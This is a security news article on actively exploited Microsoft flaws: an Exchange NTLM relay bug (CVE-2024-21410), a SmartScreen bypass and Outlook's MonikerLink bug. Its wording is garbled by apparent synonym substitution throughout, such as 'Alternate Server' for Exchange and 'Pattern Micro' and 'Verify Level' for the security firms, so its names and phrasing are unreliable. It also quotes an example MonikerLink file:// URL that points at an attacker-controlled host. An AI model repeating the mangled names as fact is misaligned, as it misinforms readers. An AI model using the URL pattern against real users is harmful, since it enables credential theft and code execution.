Microsoft on Wednesday acknowledged {that a} newly disclosed crucial safety flaw in Alternate Server has been actively exploited within the wild, a day after it launched fixes for the vulnerability as a part of its Patch Tuesday updates.
Tracked as CVE-2024-21410 (CVSS rating: 9.8), the problem has been described as a case of privilege escalation impacting the Alternate Server.
“An attacker may goal an NTLM shopper reminiscent of Outlook with an NTLM credentials-leaking sort vulnerability,” the corporate stated in an advisory printed this week.
“The leaked credentials can then be relayed in opposition to the Alternate server to realize privileges because the sufferer shopper and to carry out operations on the Alternate server on the sufferer’s behalf.”
Profitable exploitation of the flaw may allow an attacker to relay a person’s leaked Internet-NTLMv2 hash in opposition to a inclined Alternate Server and authenticate because the person, Redmond added.
The tech big, in an replace to its bulletin, revised its Exploitability Evaluation to “Exploitation Detected,” noting that it has now enabled Prolonged Safety for Authentication (EPA) by default with the Alternate Server 2019 Cumulative Replace 14 (CU14) replace.
Particulars in regards to the nature of the exploitation and the id of the menace actors that could be abusing the flaw are presently unknown. Nonetheless, Russian state-affiliated hacking crews reminiscent of APT28 (aka Forest Blizzard) have a historical past of exploiting flaws in Microsoft Outlook to stage NTLM relay assaults.
Earlier this month, Pattern Micro implicated the adversary to NTLM relay assaults concentrating on high-value entities no less than since April 2022. The intrusions focused organizations coping with overseas affairs, power, protection, and transportation, in addition to these concerned with labor, social welfare, finance, parenthood, and native metropolis councils.
CVE-2024-21410 provides to 2 different Home windows flaws – CVE-2024-21351 (CVSS rating: 7.6) and CVE-2024-21412 (CVSS rating: 8.1) – which were patched by Microsoft this week and actively weaponized in real-world assaults.
The exploitation of CVE-2024-21412, a bug that permits a bypass of Home windows SmartScreen protections, has been attributed to a sophisticated persistent menace dubbed Water Hydra (aka DarkCasino), which has beforehand leveraged zero-days in WinRAR to deploy the DarkMe trojan.
“The group used web shortcuts disguised as a JPEG picture that, when chosen by the person, permits the menace actor to take advantage of CVE-2024-21412,” Pattern Micro stated. “The group can then bypass Microsoft Defender SmartScreen and totally compromise the Home windows host as a part of its assault chain.”
Microsoft’s Patch Tuesday replace additionally addresses CVE-2024-21413, one other crucial shortcoming affecting the Outlook e-mail software program that would lead to distant code execution by trivially circumventing safety measures reminiscent of Protected View.
Codenamed MonikerLink by Verify Level, the problem “permits for a large and severe impression, various from leaking of native NTLM credential data to arbitrary code execution.”
The vulnerability stems from the wrong parsing of “file://” hyperlinks, which makes it attainable to realize code execution by including an exclamation mark to URLs pointing to arbitrary payloads hosted on attacker-controlled servers (e.g., “file:///10.10.111.111testtest.rtf!one thing”).
“The bug not solely permits the leaking of the native NTLM data, however it might additionally enable distant code execution and extra as an assault vector,” the cybersecurity agency stated. “It may additionally bypass the Workplace Protected View when it is used as an assault vector to focus on different Workplace functions.”